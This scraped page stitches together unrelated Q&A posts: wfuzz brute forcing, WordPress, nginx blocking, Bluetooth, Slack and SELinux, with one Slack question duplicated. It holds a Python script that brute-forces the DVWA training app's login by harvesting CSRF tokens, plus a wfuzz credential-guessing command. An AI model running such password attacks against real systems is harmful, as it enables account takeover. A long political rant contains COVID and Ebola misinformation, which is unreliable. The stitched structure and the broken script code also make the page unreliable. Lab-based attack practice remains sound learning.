brute force – curl to wfuzz translation

I am trying to run wfuzz to match the curl command which works, I know valid credentials but it doesn’t seem to pass it properly.

wfuzz -c -w user -w pass -b "session=cookie" --digest FUZZ:FUZ2Z ""

(user and pass files contain user and pass accordingly)

curl -c cookie --digest -u user:pass

The target is running Gunicorn web server

custom post types – Force documents to appear in Featured Image dialogue

Having a perplexing issue… …for a custom post-type called ‘Resources’ I used the ‘Featured Image’ or ‘thumbnail’ function within WordPress to allow users to attach documents to ‘Resources’. The process itself works exactly as expected and anticipated.

However, setting the site up, someone made a mistake and uploaded two documents and assigned them to the wrong ‘Resources’. So Resource A -> Document B and Resource B -> Document A.

When attempting to switch them and clicking ‘Edit Featured Image’ you are unable to see any of the documents. They clicked ‘Remove Featured Image’ and then ‘Set Featured Image’ and when the dialogue opens, still no documents.

In the WordPress Media Library all of the uploaded and attached documents are there. Visible, with previews, etc. As expected. Here’s the first two rows of the Media Library. You can see tons of PDFs that have been successfully uploaded.
Media Library

The only place where this issue appears is that in the actual ‘Featured Image’ media dialogue box, WordPress will not display any PDFs.

Here’s the CPT supports segment:

$rsc_supports = array(

Like I said, everything works perfectly – even uploading and attaching PDFs as ‘thumbnails’ to be associated as attachments with the CPT. When a PDF is attached and you ‘Click to edit’ the dialogue opens up and you can see the attached PDF in the list.
The only failing is that the ‘Featured Image’ modal/pop-up/dialogue box that loads, is designed to filter out everything except images.
This is what that dialogue box looks like on a ‘Resource’ with nothing attached.
Featured Image Dialogue

However, if you view another Resource that does have a PDF already attached, you get this:
With PDF Attached

I have tried the filtering and date dropdown and they don’t address this.

I believe this is by design. So my question is, “How do I modify that dialogue box to display all files rather than just images?”

brute force attacks – Block bruteforce attempts with nginx & cloudflare without rate limiting

So I discovered servers trying to bruteforce my API so I want to block them…but my specific scenario made it difficult to work with common solutions found on the internet.

1] I don't want to just rate limit, if any IP attempts to authenticate with the API and fail more than X times in ~6 hours I want to block them. No answers anymore at all. Not even 429 replies

2] I'm using cloudflare, so I need to use the CF IP header

3] I can't block the traffic based on iptables or similar solutions, since the only IPs that talk to my server are cloudflare IPs

4] The API generates nginx errors if the authentication fails with `2: no such file or directory` if that helps with something

Given my scenario, what are the possible solutions?

Force bluetooth usb adapter Mac Catalina

I’m having trouble forcing my mac to stay connected to my external USB Bluetooth adapter on reboot/restart.

I’ve read quite a few posts and have found this command

sudo nvram bluetoothHostControllerSwitchBehavior=always

I was able to use Bluetooth Explorer and I switched it to the new bluetooth USB dongle but it will still not remain connected after reboot. Instead it remains disconnected and I have to reconnect it every time I restart my computer.

Is there another command that I can use that will keep it connected after reboot?

Do you think all the George Floyd riots and protests will cause a Coronavirus spike and force us into another 3 months of economic shutdown?

They’re telling the experts & (D) who said believe the science that their science is pointless with people who have nothing better to do because of grounding shutdowns. Officer Derek Chauvin got carried away & forgot that he doesn’t live in Haiti, Liberia, South Sudan, Venezuela, N. Africa, Middle East, Brazil & even Mexico where it is routine for cops to shoot 1st & ask question later specially if the suspect is a well known career criminal. 


Criminals released by the thousands due to COVID-19 concerns & have been re-offending since their release, saw an opportunity along gang members, ANTIFA & easily influenced millennials. De Blasio was surprised that criminals that were released were reoffending & Los Angeles Police Chief warned the public that thousands of criminals will re-commit crimes. Criminals having impunity is the transition towards Venezuelan  Socialism for supporting the socialist regime. (D)s have been setting the stage for Socialism since 2007. No justice no peace is a call for criminals to wreck havoc, not protest. Abuse of authority certainly calls for protest, but this is not a protest. These are criminals, thugs, thieves & arsonist as described by Obama when he was in office. It’s Ironic that, celebrities, politicians, & protestors supports abuse of authority carried out by Comey, Brenan, Clapper, Obama, Lynch, Rice, Nadler, Schitt… Supporting a preferred abuse of power will turn the USA into Sub Saharan ruled countries, Haiti, ISIS Caliphate, Venezuela, San Salvador, Brazil & even Mexico where corruption is rampant & a way of life.

Sweden revered as a socialist success did not take the socialist approach of shutting down their economy as they knew COVID-19 isn’t apocalyptic & will spreads no matter how (D)s & partisan news media makes it apocalyptic while the young & healthy rarely affected keeps the economy stable. Doctor Dan Erickson analyzed & exposed the natural & pre-existing conditions deaths are being classified as COVID-19 death, & Influenza deaths are likely being counted as well.

Worldwide Deaths from 01/01/20 – 04/04/20: COVID-19 59,226, Seasonal Flu 125,352, Water Related Diseases 217,099, Malaria 252,878, Suicides 276,480, Road Accidents 348,044, HIV/AIDS 433,382, Alcohol 644,785, Smoking 1,288,753, Cancer 2,117,316, Hunger 2,883,497

AOC work boycott & (D)s would rather have the middle class & working poor unemployed & out of business impowering (D) congress with leverage to exploit the situation as more foreigners are brought in to replace 40% millions of unemployed US citizens from the pandemic. At some point the country & the world will need to cope & live with COVID-19 along other diseases that are far more lethal & incurable than COVID-19. With an incubation period of 2 weeks, 6 weeks quarantine/shutdown is more than enough & should’ve transitioned to targeted shutdown. The world is still dealing with HIV, EBOLA (99% mortality), Hepatitis C & Syphilis without a vaccine. Shutdowns for more than a couple of months will put 280 million US folks in poverty. A year shutdown will put 320 Million Americans in poverty where the government will have to nationalize the industries, private property, & public individualism inducing famine, unproductivity, desperations & deaths.

Despite how American socialists (Sanders & the squad) brand their socialism as Democratic Socialist to mask their true intentions to achieving the end goal of Socialist state control of the economy, industry, property & public by bureaucratic regulations. Everything they propose such as public education (free & mediocre) & universal single payer healthcare (rationed) is straight up USSR, Cuba & Venezuela’s play book which Sanders lauds & defends. (Venezuela was praised as Democratic Socialist that was actually Communist with its bureaucrats pillaging oil revenues). These socialist countries don’t have state of the art Hospitals & Cadillac Gov. Assist. for all (only 0.0001%) because there isn’t enough funds & man power regardless of how much industries are taxed & nationalized. Ultimately all concept or branding of socialism leads to Government owned property of industries, housing, farms, people, long working hours, & NO: dissenting free speech, entrepreneurship, competition, varieties in brands or materials with very little individuality, motivation, & productivity.

In a Socialist country it is very hard to impossible to be a Millionaire when socialists like Bernie & AOC will take 90% of an entrepreneurs wealth, income, & property. Sanders always touts Sweden (less densely populated homogenous country) as a socialist success where Millionaires & Billionaires thrives from the middle class & the working poor being the ones funding most gov. assistance in Sweden. Bernie & AOC will use every means of pressure & influence in advancing the Green New Deal’s socialist agenda funded by the top 21% ($Millionaires/$Billionaires) turning that into the top 0.0001% for the US economy & society to permanently mirror Cuba, Venezuela & N. Korea eliminating most of the rich (except elites in government) & all middle class to exist as income among the rich, middle & poor are flattened to the lowest level.

Lesson for America: Sweden is not Socialist

Youtube thumbnail

Youtube thumbnail

A nationwide 75% economic shutdown to essentials only is a communist model economy from a pandemic or warfare that plunges 1st world economies into a depression for socialism to takes hold & permanently take over under the Green New Deal (New Communist Manifesto). Anyone who has lived & escaped Venezuela knows this feeling, once all Industries & Private Properties are nationalized. Senate/House (D)s Green New Deal will shape America’s economy in line with Venezuela & Cuba where bureaucrats control the economy & profits (ripe for corruptions). Everyone will either be working for the government assigned jobs deemed necessary, or unemployed on rationed gov. assistance & rent free dilapidated apartment in disrepair.

Bernie & AOC’s Green New Deal is designed to destroy America from within & the intent of 3rd world socialist countries to prosper, but only 2nd – 8th largest adversarial or rival countries will. The military will become very ineffective so the US can’t be SAVIORS or police of the world. The United States would be ripe for the Taking or break apart into 50 or 10 separate independent countries as its defensive arsenals of carbon emitting internal combustion engines, rocket engines, Jet engines, bombs, missiles, cannon powder… would be out of commission. AOC want to dissolve Homeland Security & the Military so that customs, Coast Guard, Navy, Army, & Airforce can’t defend against Drug Cartels, Drug Mules, Drug Dealers, Human Traffickers, Criminal Gangs, Common Criminals, ISIS or Al Qaeda operatives like the Boston Marathon Bomber (Tsarnaev), San Bernardino shooter (Farook), & Florida gay bar shooter (Mateen).

As the hospitalization curve has been flattened & minimized to safely open in 3 phases, (D) States Governors are doing all they can to prolong the shutdowns seeing the pandemic as an opportunity to erase decades long debt & mismanagement they have incurred from spending more than the high taxes they collect as they scheme with (D) Congress (has power of purse) for a bailout & print endless money regardless of how much the US dollar will deflate in value taking a page from the Venezuelan & Zimbabwean model where $1 is a Trillion in Zimbabwean & Venezuelan currency. The pandemic is resetting the world nations’ economies, but 1st world countries have the means to bounce back with their infrastructures in logistic, manufacturing, retail, natural resources, academics, engineering & science. Due to crimes, corruption, & brain drain of special skill, 3rd world economies have no chance to surpass 1st world economies.…………

Youtube thumbnail

Brute Force HIGH DVWA with Python Script

I’m new using python and I’m trying to BruteForce DVWA in High Level, I found this script from . But this error always pop up when I execute it. Any help is welcome,Thank U.


File “”, line 32, in csrf_token = soup.findAll(attrs={“name”: “user_token”})(0).get(‘value’) IndexError: list index out of range.

Whole Script:

from sys import argv
import requests
from BeautifulSoup import BeautifulSoup as Soup
# give our arguments more semantic friendly names
script, filename, success_message = argv
txt = open(filename)
# set up our target, cookie and session
url = ''
cookie = {'security': 'high', 'PHPSESSID':'b8dgqhbue8vdinrd87leug1no1'}
s = requests.Session()
target_page = s.get(url, cookies=cookie)
@param: html (String)
Searches the response HTML for our specified success message
def checkSuccess(html):
 # get our soup ready for searching
 soup = Soup(html)
 # check for our success message in the soup
 search = soup.findAll(text=success_message)

 if not search:
  success = False
  success = True
# return the brute force result
 return success
# Get the intial CSRF token from the target site
page_source = target_page.text
soup = Soup(page_source);
csrf_token = soup.findAll(attrs={"name": "user_token"})(0).get('value')
# Loop through our provided password file
with open(filename) as f:
 print 'Running brute force attack...'
 for password in f:
  # setup the payload
  payload = {'username': 'admin', 'password': password, 'Login': 'Login', 'user_token': csrf_token}
  r = s.get(url, cookies=cookie, params=payload)
  success = checkSuccess(r.text)
  if not success:
   # if it failed the CSRF token will be changed. Get the new one
   soup = Soup(r.text)
   csrf_token = soup.findAll(attrs={"name": "user_token"})(0).get('value')
   # Success! Show the result
   print 'Password is: ' + password
# We failed, bummer. 
 if not success:
  print 'Brute force failed. No matches found.'

How to force Slack to apply markdown within a word?

Slack has “recently” introduced its a bit annoying WYSIWYG “message composer” which breaks the message formatting with the inline markdown. Fortunately there is now also option called “format messages with markup” which kind of reverts this feature back to normal, but…

I would like to know, how to force this inline markdown interpreter to work also in the middle of words. For example, how to achieve these:



Apparently, the following:



do not work. There must be a separator before/after ~ or `, but if space is used, it’s no more a single word 🙁 Is there any “invisible” (and simply reachable) character Slack would accept as a separator which we could use for this purpose?

How to force SELinux to permissive even when setenforce 0 is not working and kernel was 100% permissive when flashed?

I don’t know what to do, I’m using Samsung Note 3 (Exynos) – N900 with custom Resurrection Remix 5.8.5 ROM (Android 7.1.2) with it’s own permissive kernel and rooted with Magisk. Yesterday it turned to enforcing status, then SPenCommand stopped working. And when I tried to setenforce 0 in terminal, it gave me error: invalid argument. I don’t want to flash phone again, backup takes a lot of time, as well as restoring, because I have very old PC and I flashed it on friend’s laptop who is now 50 miles away and won’t come just because of this (my computer still uses USB 1.1 interface – I know it’s garbage but its working for 15 years stable. Any suggestions how to do it on phone itself, would be helpful. Please help me somebody 🙂

How to force slack markdown within the word

Slack has “recently” introduced its a bit annoying WYSIWYG “message composer” which breaks the message formatting with the inline markdown. Fortunately there is now also option called “format messages with markup” which kind of reverts this feature back to normal, but…

I would like to know, how to force this inline markdown interpreter to work also in the middle of words. For example, how to achieve these:



Apparently following:



do not work. There must be a separator before/after ~ or `, but if space is used, it’s no more a single word 🙁 Is there any “invisible” (and simply reachable) character – slack would accept as a separator – we could use for this purpose?